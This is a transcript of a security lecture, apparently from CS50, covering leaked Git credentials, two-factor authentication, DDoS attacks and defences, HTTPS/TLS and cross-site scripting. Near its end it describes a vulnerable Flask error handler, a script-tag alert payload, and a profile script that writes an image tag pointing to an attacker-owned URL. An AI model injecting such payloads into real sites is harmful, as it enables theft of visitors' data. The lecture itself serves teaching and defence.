DOUG LLOYD: Now that we know a bit more about the internet and how it works, let's reintroduce the subject of security with this new context. And let's start by talking about Git and GitHub. Recall that Git and GitHub are a technology that are used by programmers to version control their software, which basically allows them the ability to save code to an internet-based repository in case of some failure locally, they have a backup place to put it, but also keep track of all the changes they've made and possibly go back in time in case they produce a version of code that is broken. GitHub has some great advantages, but it also has the potential disadvantages because of this structure of being able to go back in time. So for example, imagine that what we have is an initial commit, and commit is just GitHub parlance for a set of code that you are sending to the internet. So I've decided to take file A, file B, and file C in their current versions. I've saved them using control S or command S literally on my machine, and I want to send those versions to GitHub to be stored permanently or semi-permanently. You would package those up in what's called a commit and then push that code to GitHub where it would then be visible online. And this would be packaged as a commit. And all the files that we view on GitHub are tracked in terms of commits. And commits chain together. And we've seen this idea of chaining in the past when we've discussed linked lists, for example. So every commit knows about the one that comes after it once that commit is eventually pushed as well as all of the ones that preceded it. So imagine we have an initial comment where we post some code and then we write some more-- we make some more changes. We perhaps update our database in such a way where when we post or push-- excuse me-- our second commit to GitHub, we accidentally expose the database credentials. So perhaps someone inadvertently typed the password for how to access the database into some Python code that would then be used to access that database. That's not a good thing. And maybe somebody quickly realized it and said, you know what? We need to get this off of GitHub. It is a source repository. It's available online. And so they push a third commit to GitHub that deletes those credentials. It stores them somewhere else that's not going to be saved on this repository. But have we actually solved the problem? And you can probably imagine that the answer is no, because we have this idea of version control where every past iteration of all of these files is stored still on GitHub such that, if I needed to, I could go back in time. So even though I attempted to solve the security crisis I just created for myself by introducing a new commit that removes the credentials from those files such that, if I'm looking just at the most recent version of the files, I don't see it anymore. I still have the ability to go back in time, so this doesn't actually solve a problem. See, one of the interesting things about GitHub is the model that is used for it. At the very beginning of GitHub's existence, it relied pretty extensively on this idea of you sign up for free, you get a free account for GitHub, and you have a limited number of private repositories, repositories that are not publicly viewable or searchable, and you could pay to have more of them if you wanted to. But the majority of your repositories, assuming you did not opt into a paid account, were free, which meant anybody on the internet could search them using GitHub's search tool, or using even a regular search engine such as Google, could just look for something. And if your GitHub repositories happen to match what that person searched or specifically, if you're looking within GitHub search feature, if a user is looking for specific lines of code, anything in a public repository, it is available. Now, GitHub has recently changed to a model where there are more private repo-- or there's a higher limit on the number of private repositories that somebody could have. But this was part of Github's design to really encourage developers and programmers to sort of create this open source community where anybody could view someone else's code, and in GitHub parlance, fork their code, which basically means to take their entire repository or collection of files and copy it into their own GitHub repository to perhaps make changes or suggest changes, pushing those back into the code base with the idea being that it would make the entire community better. A side effect, of course, is that items get revealed when we do so because of this public repository setup we have here. So GitHub is great in terms of its ability for programmers to refer to materials on the internet. They don't have to rely on their own local machines to store code. It allows people to work from multiple workstations, similar to how Dropbox or Google Drive, for example, might allow you to access files from different machines. You don't have to be on a specific machine to access a file, as we used to have to do before these cloud-based document storage services existed. And it encourages collaboration. For example, if you and I were to collaborate on a GitHub repository, I could push changes to that repository that you could then pull. And we could then be working off of the same code base again. We sort of have this central repo-- central area where we share our code with one another. And we can each individually make changes and incorporate one another's changes into the final products. So we're always working off of the same base of material. The side effect, though, again, is this material is generally public unless you have opted into a private repository where you have specific individuals who are logged in with their GitHub accounts who want to share. So is there a way to solve this problem, though, of we accidentally expose our credentials in a public repository? Of course, if we're in a private repository, this might not be as alarming. It's still probably not something you-- it should be encouraged to have credentials for anything stored anywhere, whether public or private, on the internet. It's a little riskier. But is there a way to get rid of this or to prevent this problem from happening? And fortunately, there are a number of different safeguards specific to Git and GitHub that we can use to prevent the accidental leakage of information, so to speak. So for example, one way we can handle this is using a program or utility called GitSecrets. GitSecrets works by looking for what's called a regular expression. And a regular expression is computer science parlance for a particular formation of a string, so a certain number of characters, a certain number of digit characters, maybe some punctuation marks. You can say, I'm looking for strings that match this idea. And you can express this idea where this idea is all capital letters, all lowercase letters, this many numbers, and this many punctuation marks, and so on using this tool called a regular expression. But GitSecrets contains a list of these regular expressions and will warn you when you are about to make a commit, when you're about to push code or send code to GitHub to be stored in its online repository that you have a string that matches this pattern that you wanted me to warn you about. And so be sure before you commit this code and push this code that you actually intend to send this up to GitHub, because it may be that this matches a password string that you're trying to avoid. So that's an interesting tool that can be used for that. You also want to consider limiting third party app access. GitHub accounts are actually very common to use as other forms of login, for example. So there's a platform on the internet called OAuth which allows you to use, for example, your Facebook account or your Google account to log into other services. Perhaps you've encountered this in your own experience working with different services on the internet. Instead of creating a login for site x, you could use your Facebook or Google login, or, in many instances as well, your GitHub log in to do so. When you do so, though, you are allowing that third party application, someone that's not GitHub, the ability to use and access your GitHub identity or credential. And so you should be very careful with not only GitHub but other services as well, thinking about whether you want that other service to have access to your GitHub, or Facebook, or Google account information to use it even just for authentication. It's a good idea to try and limit how much third party app access you're giving to other services. Another tool is to use something called a commit hook. Now, commit hook is just a fancy term for a short program or set of instructions that executes when a commit is pushed to GitHub. So for example, many of the course websites that we use here at Harvard for CS50 are GitHub-based, which means that when we want to change the content on the course website, we update some HTML, or Python, or JavaScript files, we push those to GitHub, and that triggers a commit hook where basically that commit hook copies those files into our web server, runs some tests on them to make sure that there's no errors in them. For example, if we wrote some JavaScript or Python that was breaking, it had a bug in it, we'd rather not deploy that bug so to speak. We wouldn't want the broken version of the code to replace the currently working website. And so commit hook can be used to do testing as well. And then once all the tests pass, we then are able to activate those files on the web server and the changes have happened. So we're using GitHub to store the changes that we want to make on our site, the HTML, the Python, the JavaScript changes that we want to make. And then we're using this commit hook, a set of instructions, to copy them over and actually deploy those changes to the website once we've verified that we haven't made anything break. You can also use commit hooks, for example, to check for passwords and have it warn you if you have perhaps leaked a credential. And then you can undo that with a technique that we'll see in just a moment. Another thing that you can do when using GitHub to protect or verify your identity is to use an SSH key. SSH keys are a special form of a public and private key. In this case, it's really not used for encryption, though. It's actually used as identification. And so this idea of digital signatures, which you may recall from a few lectures ago, comes back into play. Whenever I use an SSH key to push my code to GitHub, what happens is I also digitally sign the commit when I send it up. And so before that commit gets posted to GitHub, GitHub verifies this by checking my public key and verifying, using the mathematics that we've seen in the past, that, yes, only Doug could have sent this to me because only Doug's public key will unscramble this set of zeros and ones that I received that only could have then been created by his private key. These two things are reciprocal of one another. So we can use SSH keys and digital signatures as an identity verification scheme as well for GitHub as we might be able to for mailing documents, or sending documents, or something like that. Now, imagine we have posted the credentials accidentally. Is there a way to get rid of them? GitHub does track our entire history. But what if we do make a mistake? Human beings are fallible. And so there is a way to actually eliminate the history. And that is using a command called Git Rebase. So let's go back to the illustration we had a moment ago where we have several different commits. And I've added a fourth commit here just for purposes of illustration. So our first commit and our second commit, and then it's after that that we expose the credentials accidentally, and then we have a fourth commit where we actually delete that mistake that we had previously made. When we want to Git Rebase, the idea is we want to delete a portion of the history. Now, deleting a portion of the history has a side effect of any changes that I made here or here. In this illustration, we're going to get rid of the last two commits. Any changes that I've made besides accidentally exposing the credentials are also going to be destroyed. And so it's going to be incumbent on us to make sure to copy and save the changes we actually want to preserve in case we've done more than just expose the credentials. And then we'll have to make a new commit in this new history we create so that we can still preserve those changes that we want to make. But let's say, other than the credentials, I didn't actually do anything else. One thing I could do is rebase or set as a new start point, basically, this second commit as the end of the chain. So instead of going all the way to here and having that preserved ad infinitum, I want to just get rid of everything from the second commit forward. And I can do that. And then those commits are no longer remembered by GitHub. And as soon as the next commit I have would go here, right after second commit as opposed to imagining a fifth one there right after credentials being removed, those commits are, for all intents and purposes on GitHub, forgotten. And finally, one more thing that we can do when using GitHub is to mandate the use of two-factor authentication. Recall we've discussed two-factor authentication a little bit previously. And the idea is that you have a backup mechanism to prevent unauthorized login. And the two factors in two-factor authentication are not two passwords, because those are fundamentally quite similar. The idea is that you want to have something that you know, for example, a password-- that's usually very commonly one of the two factors in two-factor authentication-- and something that you have, the thought being that an adversary is incredibly unlikely to have both things at the same time. They may know your password, but they probably don't have your cell phone, for example, or your RSA key. They may have stolen your phone or they may have stolen your RSA key, but they probably don't also know your password. And so the idea is that this provides an additional level of defense against potential hacking, or breaking into accounts, or unauthorized behavior in accounts that you obviously don't want to happen. Now, an RSA key, if you're unfamiliar, is something that looks like this. There's different versions of them. They've sort of evolved over time. This one is actually a combined RSA key and USB drive. And inside the window here of the RSA key is a six digit number that just changes every 60 seconds or so. So when you are given one of these, for example, perhaps at a firm or a business, it is assigned to you specifically. There's a server that your IT team will have setup that maps the serial number on the back of this RSA key to your employee ID, for example. But they otherwise don't know what the number currently on the RSA key is. They only know who owns it, who is physically in possession of it, which employee ID it maps do. And every 60 seconds it changes according to some mathematical algorithm that is built into the key that generates numbers in a pseudo random way. And after 60 seconds, that code will change into something else. And you'll need to actually have the key on you to complete a login. If an RSA key is being used to secure such that you need to enter a password and your RSA key value, you would need to have both. No other employee RSA key-- well, hypothetically, I guess there's a one in a million chance that it would happen to be randomly showing the same number at the same time. But no other employee's RSA key could be used to log in. Only yours could be used to log in. Now, there are several different tools out there that can be used to provide two-factor authentication services. And there's really no technical reason not to use these services. You'll find them as applications on cell phones, most likely. And you'll find ones like this, Google Authenticator, Authy, Duo Mobile. There are lots of others. And if you don't want to use one of those applications specifically, many services also just allow you to receive a text message from the service itself. And you'll just get that via SMS on your phone, so still on your phone, just not tied to a specific application. And while there's no technical reason to avoid two-factor authentication, there is sort of this social friction surrounding two-factor authentication in that human beings tend to find it annoying, right? It used to be username, password, you're logged in. It's pretty quick. Now it's username, password, you get brought to another screen, you're asked to enter a six-digit code, or maybe in some advanced applications you get a push notification sent to your device that you have to unlock and then hit OK on the device. And people just find that inconvenient. We haven't yet reached this point culturally where two-factor authentication is the norm. And so it's sort of a linchpin when we talk about security in the internet context, is human beings being the limiting factor for how secure we can be. We have the technology to take steps to protect ourselves, but we don't feel compelled to do so. And we'll see this pattern reemerge in a few other places today. But just know that that is why perhaps you're not seeing so much adoption of two-factor authentication. It's not that it's technically infeasible to do so. It's just that we just find it annoying to do so, and so we don't adopt it as aggressively as perhaps we should. Now let's discuss the type of attack that occurs on the internet with unfortunate regularity, and that is the idea of a denial of service attack. Now, the idea behind these attacks is basically to cripple the infrastructure of a website. Now, the reason for this might be financial. You want to try and sabotage somebody. There might be other motivations, distraction, for example, by tying up their resources, trying to stop the attack. It opens up another avenue to do something else, to perhaps steal information. There's many different motivations for why they do this. And some of them are honestly just boredom or fun. Amateur hackers sometimes think it's fun to just initiate a denial of service attack against an entity that is not prepared to handle it. Now, in the associated materials for this course, we provided an article called Making Cyberspace Safe for Democracy, which we really do encourage you to take a look at, read, and discuss with your group. But I also want to take a little bit of time right now just to talk about this article in particular and draw your attention to some areas of concern or some areas that might lead to more discussion. Now, the biggest of these is these attacks tend not to be taken very seriously by people when they hear about them. You'll occasionally hear about these attacks in the news, denial of service attacks, or their cousin, distributed denial of service attacks. But culturally, again, us being humans and sort of neglecting some of the real security concerns here, we don't think of it as an attack. And that's maybe because of how we hear about other kinds of attacks on the news that seem more physically devastating, that have more real consequences. And it makes it hard to have a serious conversation about cyber attacks because there's this friction that we face trying to get people to understand that these are meaningful and real. And in particular, these attacks are kind of insidious. They're really easy to execute without much difficulty at all, especially against a small business that might be running its own server as opposed to relying on a cloud service. A pretty top-of-the-line, commercially available machine might be able to execute a denial of service or DoS attack on its own. It doesn't even require exceptional resources. Now, when we start to attack mid-sized companies, or larger companies or entities, one single computer from one single IP address is not typically going to be enough. And so instead, you would have a distributed denial of service attack. In a distributed denial of service attack, there is still generally one core hacker, or one collective group of hackers or adversaries that are trying to penetrate some company's defenses. But they can't do it with their own machine. And so what they do is create something called a botnet. Perhaps you've heard this term before. A botnet basically happens, or is created, when hackers or adversaries distribute worms or viruses sort of surreptitiously. Perhaps they packaged them into some download. People don't notice anything about the worm or anything about this program that has been covertly installed on their machine. It doesn't do anything in particular until it is activated. And then it becomes an agent or a zombie-- sometimes you'll hear it termed that as well-- controlled by the hackers. And so all of a sudden the adversaries gain control of many different devices, hundreds or thousands or tens of thousands, or even more in some of the bigger attacks that have happened, basically turning these computers-- rendering all of them under their control and being able to direct them to take whatever action they want. And in particular, in the case of a distributed denial of service attack, all of these computers are going to make web requests to the same server or same website, because that's the idea. You have so many requests. With distributed denial of service attacks or just regular denial of service attacks, it's just a question of scale, really. We're hitting those servers with so many web requests. I want to access this. I want to access this, hundreds, thousands, tens of thousands of these requests a second such that the computer can't possibly-- the server can't possibly field all of these inquiries that are coming and trying to give these requests the data they're asking for. Ultimately, that would eventually, after enough time, result in the server just crashing, throwing up its hands and saying, I don't know what to do. I can't possibly process all of these requests. But by tying it up in this way, the adversary has succeeded in damaging the infrastructure of the server. It's either denied the server the ability to process customers and payments or it's just taken down the entire website so there's no information available about the company anymore to anybody who's trying to look it up. These attacks are actually really, really common. There are some surveys that have been out that assess that roughly one sixth to one third of average-sized businesses that are part of this tech survey that goes out every year suffer some sort of DoS attack in a given year, so 16% to 35% or so of business, which is a lot of businesses when you think about it. And these attacks are usually quite small, and they're certainly not newsworthy. They might last a few minutes. They might last a few hours. But they're enough to be disruptive. They're certainly noteworthy. And they're something to avoid if it's possible. Cloud computing has made this problem kind of worse. And the reason for this is that, in a cloud computing context, your server that is running your business is not physically located on your premises. It was often the case that when a business would run a website or would run their business, they would have a server room that had the software that was necessary to run their website or to run whatever software-based services they provided. And it was all local to that business. No one else could possibly be affected. But in a cloud computing context, we are generally renting server space and server power from an entity such as Amazon Web Services, or Google Cloud Services, or some other large provider where it might be that 10, 20, 50, depending on the size of the business in question here-- multiple businesses are sharing the same physical resources, and they're sharing the same server space, such that if any one of those 50, let's say, businesses is targeted by hackers or adversaries for a denial of service attack, that might actually, as collateral damage, take out the other 49 businesses. They weren't even part of the attack. But cloud computing is-- we've heard about it as it's a great thing. It allows us to scale out our websites, make it so that we can handle more customers. It takes away the problem of security, web-based security, because we're outsourcing that to the cloud provider to give that to us. But it now introduces this new problem of, if we're all sharing the resources and any one of us gets attacked, then all of us lose the ability to access those resources and use them, which might cause all of our organizations to suffer the consequences of one single attack. This collateral damage can get even worse when you think about servers that are-- or businesses whose service is providing the internet, OK? So a very common example of this, or a noteworthy example of this, happened in 2016 with a service called DYN, D-Y-N. DYN is a DNS service provider, DNS being the domain name system. And the idea there is to map the things like www.google.com to its IP address. Because in order to actually access anything on the internet or to have a communication with anyone, you need to know their IP address. And as human beings, we tend not to actually remember what some website's IP address is, much like we may not recall a certain phone number. But if it has a mnemonic attached to it-- so for example, you know back in the day we had 1-800-COLLECT for collect calls. If you forgot the number, the literal digits of that phone number, you could still remember the idea of it because you had this mnemonic device to help remind you. Domain names, www.whatever.com, are just mnemonic devices that we use to refer to an IP address. And DNS servers provide this service to us. DYN is one of the major DNS providers for the internet overall. And if a denial of service attack, or in this case it was certainly a distributed denial of service attack because it was enormous, goes after pinging the IP address or hitting that server over and over and over, then it is unable to field requests from anyone else, because it's just getting pummeled by all of these requests from some botnet that some adversary or collective of adversaries has taken control of. This, the collateral damage, is no one can ever map a domain name to an IP address, which means no one can visit any of these websites unless you happen to know at the outset what the IP address of any given website was. If you knew the IP address, this wasn't a problem. You could just still directly go to that IP address. That's not the kind of attack here. But the attack instead tied up the ability to translate these mnemonic names into numbers. And as you can see, DYN was a DNS-- or is a DNS provider for much of the eastern half of the United States as well as the Pacific Northwest and California. And if you think about what kinds of businesses are headquartered in the Pacific Northwest and in California and in the New York area, for example, you probably see that some major, major services, including GitHub, which we've already talked about today, but also Facebook and others-- Harvard University's website was also taken down for several hours. This attack lasted about 10 hours, so quite prolonged. It really did a lot of damage on that day. It really crippled the ability of people to use the internet for a long period of time, so kind of very interesting. This article also talks a bit about how the United States government has decided to-- or legislature-- handle these kinds of issues, computer-based attacks. It takes take a look at the Computer Fraud and Abuse Act, which is codified at 18 USC 1030. And this is really the only computer crimes, general computer crimes, law that is on the books and talks about what it means to be a protected computer. And you'll be interested to know perhaps that any computer pretty much is a protected computer. The law specifically calls out government computers as well as any computer that may be involved in interstate commerce, which is you can imagine anybody who uses the internet, their computer then falls under the ambit of this act. So it's another interesting thing to take a look at if you're interested in how we deal with processing or prosecuting violations of computer-based crimes. All of it is actually sort of dealt with in the Computer Fraud and Abuse Act, which is not terribly long and hasn't been updated extensively since the 1980s other than some small amendments. So it's kind of interesting that we have not yet gotten to the point where we are defining and prosecuting specific types of computer crime, even though we've begun to figure out different types of computer crimes, such as DoS attacks, such as phishing, and so on. Now, hypothetically, a simple denial of service attack should be pretty easy to stop. And the reason for that is that there's only one person making the attack. All requests, recall, that happen over the internet happen via HTTP. And HTTP requires that the sender's IP address be part of that envelope that gets sent over, such that the server who wants to respond to the client, or the sender, can just reference. It's the return address. You need to be able to know where to send the data back to. And so any request that is coming from-- there are thousands of requests that might be coming from a single IP address. If you see that happening, you can just decide as a server in the software to stop accepting requests from that address. DDoS attacks, distributed denial of service attacks, are much harder to stop. And it's exactly because of the fact that there is not a single source. If there's a single source, again, we would just completely stop accepting any requests of any type from that computer. However, because we have so many different computers to contend with, the options to handle this are a bit more limited. There are some techniques for averting them or stopping them once they are detected, however, the first of which is firewalling. So the idea of a firewall is we are only going to allow requests of a certain type. We're going to allow them from any IP address, but we're only going to accept them into this port. Recall that TCPIP gives us the ability to say this service comes in via this port, so HTTP requests come in by a port 80. HTTPS requests come in via port 443. So imagine a distributed denial of service attack where typically the site would expect to be receiving requests on HTTPS. It generally only uses secured HTTP in order to process whatever requests are coming in. So it's expecting to receive a lot of traffic on port 443. And then all of a sudden a distributed denial of service attack begins and it's receiving lots of requests on port 80. One way to stop that attack before it starts to tie up resources is to just put a firewall up and say, I'm not actually going to accept any requests on port 80. And this may have a side effect of denying certain legitimate requests from getting through. But since the vast majority of the traffic that I receive on the site comes in via HTTPS on port 443, that's a small price to pay. I'd rather just allow the legitimate requests to come in. So that's one technique. Another technique is something called sinkholing. And it's exactly what you probably think it is. So a sinkhole, as you probably know, is a hole in the ground that swallows everything up. And a sink hole in digital context is a big black hole, basically, for data. It's just going to swallow up every single request and just not allow any of them out. So this would, again, stop the denial of service attack because it's just taking all the requests and basically throwing them in the trash. This won't take down the website of the company that's being attacked, so that's a good thing. But it's also not going to allow any legitimate traffic of any type through, so that might be a bad thing. But depending on the length of the attack, if it seems like it's going to be short, if the requests trickle off and stop because the attackers realize, we're not making any progress, we're not actually doing-- we're not getting the results that we had hoped for, then perhaps they would give up. Then the sinkhole could be stopped and regular traffic could start to flow through again. So a sinkhole is basically just take all the traffic that comes in and just throw it in the trash. And then finally, another technique we could use is something called packet analysis. So again, HTTP we know is requests via the web. And we learned a little bit that we have headers that are packaged alongside those HTTP packets where the request originated from, where it's going to. There's a whole lot of other metadata as well. You'll know, for example, what type of browser the individual is using and what operating system perhaps they are using and where, as in sort of a geographical generalization, are they. Are they in the US Northeast? Are they in South America and so on? Instead of deciding to restrict traffic via specific ports or just restrict all traffic, we could still allow all traffic to come in but inspect all of the packets as they come in. So for example, perhaps most of the traffic on our site we are expecting to come from the-- just because I used that example already-- US Northeast. And then all of a sudden we are experiencing tons of packets coming in that have IP addresses that all seem to be based-- or they have, as part of their packets, information that says that they're from South America, or they're from the US West Coast, or somewhere else that we don't expect. We can decide, after taking a quick look at that packet and analyzing those individual headers, that I'm not going to accept any packets from that location. The ones that match locations I'm expecting, I'll let through. And this, again, might prevent certain customers from getting through, certain legitimate customers who might actually be based in South America from getting through. But in general, it's going to block most of the damaging traffic. DDoS attacks are really frustrating for companies because they really can do a lot of damage. Usually the resources of the company will eventually-- especially if they're cloud-based and they rely on their cloud provider to help them scale up, usually the resources of the company being attacked are enough to eventually overwhelm and stop the attacker who usually has a much more limited set of resources. But again, depending on the type of business being attacked in this way-- again, think of the example of DYN, the DNS provider. The ramifications for one of these attacks can be really quite severe and really quite annoying and costly for a business that suffers it. So we just talked about HTTP and HTTPSS a moment ago when we were talking about firewalling, allowing some traffic on some of the ports but not other ports, so maybe allowing HTTP traffic but not HTTPS traffic. Let's take a look at these two technologies in a bit more detail. So HTTP, again, is the hypertext transfer protocol. It is how hypertext or web pages are transmitted over the internet. If I am a client and I make a request to you for some HTML content, then you as a server would send a response back to me, and then I would be able to see the page that I had requested. And every HTTP request has a specific format at the beginning of it. For example, we might see something like this, GET /execed HTTP/1.1, host: law.harvard.edu. Let's just quickly pick these apart again one more time. If you see GET at the beginning of an HTTP request, it means please fetch or get for me, literally, this page. The page I'm requesting specifically is /execed. And the host that I'm asking it from is, in this case, law.harvard.edu. So basically what I'm saying here is please fetch for me, or retreat from me, the HTML content that comprises http://law.harvard.edu/execed. And specifically I'm doing this using HTTP protocol version 1.1. We're still using version 1.1 even though I believe version 2.0 was defined almost 20 years ago now probably. And basically this is just HTTP's way of identifying how you're asking the question. So it's similar to me making a request and saying, oh, by the way, the rest of this request is written in French, or, oh, by the way, the rest of this request is written in Spanish. It's more like here are the parameters that you should expect to see because this request is in version 1.1, which differed non-trivially from version 1.0. So it's just an identifier for how exactly we are formatting our request. But HTTP is not encrypted. And so if we think about making a request to a server, if we're the client on the left and we're making a request to a server on the right, it might go something like this. Because the odds are pretty low that, if we're making a request, we are so close to the server that would serve that request to us that it wouldn't need to hop through any routers along the way. Remember, routers, their purpose in life is to send traffic in the right direction. And they contain a table of information that says, oh, if I'm making a request to some server over there, then the best path is to go here, and then I'll send it over there, and then it will send it there. Their job is to optimize and find the best path to get the request to where it needs to be. So if I'm initiating a request to, as the client, the server, it's going to first go through router A who's going to say, OK, I'm going to move it closer to the server so that it receives that request, goes to router B, goes to router C. And eventually router C perhaps is close enough to the server that it can just hand off the request directly. The server's then going to get that request, read it as HTTP/1.1, look at all the other metadata inside of the request to see if there's anything else that it's being asked for, and then it's going to send the information back. And in this example I'm having it go back exactly through the same chain of routers but in reverse. But in reality, that might be different. It might not go through the exact same three routers in this example in reverse. It might actually go from C to A to B, back to A depending on traffic that's happening on the network and how congested things are and whether there might be a new path that is better in the amount of time it took to process the request that I asked for. But remember, HTTP, not secured. Not encrypted. This is plain, over-the-air communication. We saw previously, when we took a look at a screenshot from a tool called Wireshark, that it's not that difficult on an unsecured network using an unsecured protocol to read, literally, the contents of those packets going to and from. So that's a vulnerability here for sure. Another vulnerability is any one of these computers along the way could be compromised. So for example, router A perhaps was infected by somebody who-- a router is just a computer as well. So perhaps it was infected by an adversary with some worm that will eventually make it part of some botnet, and it'll eventually start spamming some server somewhere. If router A is compromised in such a way that an adversary can just read all the traffic that flows through it-- and again, we're sending all of our traffic in an unencrypted fashion-- then we have another security loophole to deal with. So HTTPS resolves this problem by securing or encrypting all of the communications between a client and a server. So HTTP requests go to one port. We talked about that already. They go to port 80 by convention. HTTP requests go to port for 443 by convention. In order for HTTPS to work, the server is responsible for providing or possessing a valid what's called an SSL or TLS certificate. SSL is actually a deprecated technology now. It's been subsumed into TLS. But typically these things are still referred to as SSL certificates. And perhaps you've seen a screen that looks like this when you're trying to visit some website. You get a warning that your connection is not private. And at the very end of that warning, you are informed that the cert date is invalid. Basically this just means that their SSL certificate has expired. Now, what is an SSL certificate? So there are services that work alongside the internet called certificate authorities. And like GlobalSign, for example, from whom I borrowed the screenshots-- GoDaddy, who is also a very popular domain name provider, is also a certificate authority. And what they do is they verify that a particular website owns a particular private key-- or excuse me, a particular public key which has a corresponding private key. And the way they do that is they digitally sign something to the certificate authority. The certificate authority then goes through those exact same checks that we've seen before for digital signatures to verify that, yes, this person must own this public key. And the idea for this is we're trusting that, when I send a communication to you as the website owner using the public key that you say is yours, then it really is yours. There really is somebody out there or some third party that we've decided to collectively trust, the certificate authority, who is going to verify this. Now, why does this matter? Why do we need to verify that someone's public key is what they say it is? Well, it turns out that this idea of asymmetric encryption, or public and private key cryptography that we've previously discussed, does form part of the core of HTTPS. But as we'll see in a moment, we don't actually use public and private keys to communicate except at the very, very beginning of our interaction with some site when we are using HTTPS. So the way this really happens underneath the hood is via the secure sockets layer, SSL, which is now known as the transport layer security overall protocol. There's other things that are folded into it, but SSL is part of it. And this is what happens. When I am requesting a page from you, and you are the server, and I am requesting this via HTTPS, I am going to initially make a request using the public key that I believe is yours because the certificate authority has vouched for you, saying that I would like to make a encrypted request. And I don't want to send that request over the air. I don't want to send that in the clear. I want to send it to you using the encryption that you say is yours. So I send a request to you, encrypting it using your public key. You receive the request. You decrypt it using your private key. You see, OK, I see now that Doug wants to initiate a request with me, and you're going to fulfill the request. But you're also going to do one other thing. You're going to set a key. And you're going to send me back a key, not your public or private key, a different key, alongside the request that I made. And you're going to send it back to me using my public key. So the initial volley of communications back and forth between us is the same as any other encrypted communication using public and private keys that we've previously seen. I send a message to you using your public key. You decrypt it using your private key. You respond to me using my public key, and I decrypt it using my private key. But this is really slow. If we're just having communications back and forth via mail or even via text, the difference of a few milliseconds is immaterial. We don't really notice it. But on the web, we do notice it, especially if we're making multiple requests or there's multiple packets going back and forth and every single one of them needs to be encrypted. So beyond this initial volley, public and private key encryption is no longer needed because it's no longer used, because it's too slow. We would notice it if we did. Instead, as I mentioned, the server is going to respond with a key. And that key is the key to a cipher. And we've talked about ciphers before and we know that they are reversible. The particular cipher in question here is something called AES. But it is just a cipher. It is reversible. And the key that you receive is the key that you are supposed to use to decrypt all future communications. This key is called the session key. And you use it to decrypt all future communications and use it to encrypt all future communications to the server until the session, so-called, is terminated. And the session is basically as long as you're on the site and you haven't logged out or closed the window. That is the idea of a session. It is one singular experience with a page or with a set of pages that are all part of same domain name. We're just going to use a cipher for the rest of the time that we talk. Now, this may seem insecure for reasons we've talked about when we talked about ciphers and how they are inherently flawed. Recall that when we were talking about some of the really early ciphers, those are classic ciphers like Caesar and Vigenere, those are very easy to break. AES is much more complex than that. And the other upside is that this key, like I mentioned, is only good for a session. So in the unlikely event that the server chooses a bad key, for example, if we think about it as if it was Caesar, if they choose a key of zero, which would be a very bad key, or key of one that doesn't actually shift the letters at all, even if the key is compromised, it's only good for a particular session. That's not a very long amount of time. But the upside is the ability to encipher and decipher information is much faster. If it's reversible, it's pretty quick to do some mathematical manipulation and transform it into something that looks obscured and gibberish and to undo that as well. And so even though public and private keys are-- we consider effectively unbreakable, like to the point of it's mathematically untenable to crack a message using public and private key encryption. We don't rely on it for SSL because it is impractical to actually expect communications to go that slowly. And so we do fall back on these ciphers. And that really is when you're using secured encrypted communication via HTTPS. You're just relying on a cipher that just happens to be a very, very fancy cipher that should hypothetically be very difficult to figure out the key to as well. You may have also seen a few changes in your browser, especially recently. This screenshot shows a couple of changes that are designed to warn you when you are not using HTTPS encryption. And it's not necessary to use HTTPS for every interaction you have on the internet. For example, if you are going to a site that is purely informational, it's just static content, it's just a list of information, there's no login, there's no buying, there's no clicking on things that might then get tracked, for example, it's not really necessary to use HTTPS. So don't be necessarily alarmed if you visit a site and your warned it's not secure. We're told that over time this will turn red and become perhaps even more concerning as more versions of this come out and as more and more adopters of HTTPS exist as well. But you're going to start getting notifications. And you may have seen these as well in green. If you are using HTTPS and you log into something, you'll see a little lock icon here and you'll be told that it is secure. And again, this is just because human beings tend not to be as concerned about their digital privacy and their digital security when using the internet. And now the technology is trying to provide clues and tips to entice you to be more concerned about these things. Now let's take a look at a couple of attacks that are derived from things we typically consider to be advantages of using the internet. The first of these is the idea of cross-site scripting, XSS. We've previously discussed this idea of the distinction between server-side code and client-side code. Client-side code, recall, is something that runs locally on our computer where our browser, for example, is expected to interpret and execute that code. Server-side code is run on the server. And when we get information from a server, we're not getting back the actual lines of code. We're getting back the output of that code having run in the first place. So for example, there might be some code on the server, some Python code or PHP code that generates HTML for us. The actual Python or PHP code in this example would be server-side code. We don't actually ever see that code. We only see the output of that code. A cross-site script vulnerability exists when an adversary is able to trick a client's browser to run something locally. And it will do something that presumably the person, the client, didn't actually intend to do. Let's take a look at an example of this using a very simple web server called Flask. We have here some Python code. And don't be too worried if this doesn't all make sense to you. It's just a pretty short, simple web server that does two things. So this is just some bookkeeping stuff in Flask. And Flask is a package of Python that is used to create web servers. This web server has two things, though, that it does. The first is when I visit slash on my web server-- so let's say this is Doug's site. If I go to dougssite.com, which you may not actually explicitly type anymore but most browsers just add it, slash just means the root page of your server. I'm going to call the following function whose name happens to be called index in this case. Return hello world. And what this basically means is if I visit dougspage.com/, what I receive is an HTML page whose content is just hello world. So it's just an HTML file that says hello world. Again, this code here is all server-side code. You don't actually see this code. You only see the output of this code, which is this here, this HTML. It's just a simple string in this case, but it would be interpreted by the browser as HTML. If, however, I get a 404-- a 404 is a not found error. it means the page I requested doesn't exist. And since I've only defined the behavior for literally one page, slash the index page of my server, then I want to call this function not found. Return not found plus whatever page I tried to visit. So it basically is another very simple page, much like hello world here, where instead of saying hello world, it says not found. And then it also concatenates onto the very end of that whatever page I tried to visit. This is a major cross-site scripting vulnerability. And let's see why. Let's imagine I go to /foo, so dougspage/com/foo. Recall that our error handler function, which I've reproduced down here, will return not found /foo. Seems pretty reasonable. It seems like the behavior I expected or intended to have happen. But what about if I go to a page like this one? So this is what I literally type in the browser, dougspage.com/ angle bracket, script, angle bracket alert(hi) and then a closed script tag there. This script here, script here, looks a lot like HTML. And in fact, when the browser sees this, it will interpret it as HTML. And so I will get returned by visiting this page not found And then everything here except for the leading slash, which means that when I receive this and my client is interpreting the HTML, I'm going to generate an alert. What is an alert? Well, if you've ever gone to a website and had a pop-up box display some information, you have to click OK or click X to make it go away, that's what an alert is. So I visit this page on my website, I've actually tricked my browser into giving me a JavaScript alert, or I've tricked whoever visits this page's browser to give me a JavaScript alert. So that's probably not exactly a good thing. But it can get a little bit more nefarious than that. Let's instead imagine-- instead of having this be on my server, it might be easier to imagine it like this, that this is what I wrote. This script tag here's what I wrote into my Facebook profile, for example. So Facebook gives you the ability to write a short little bio about yourself. Let's imagine that my bio was this script document.write, image source, and then I have a hacker URL and everything. And imagine that I own hacker URL. So I own hacker URL and I wrote this in my Facebook profile. Assuming that Facebook did not defend against cross-site scripting attacks, which they do, but assuming that they did not, anytime somebody visited my profile, their browser would be forced to contend with this script tag 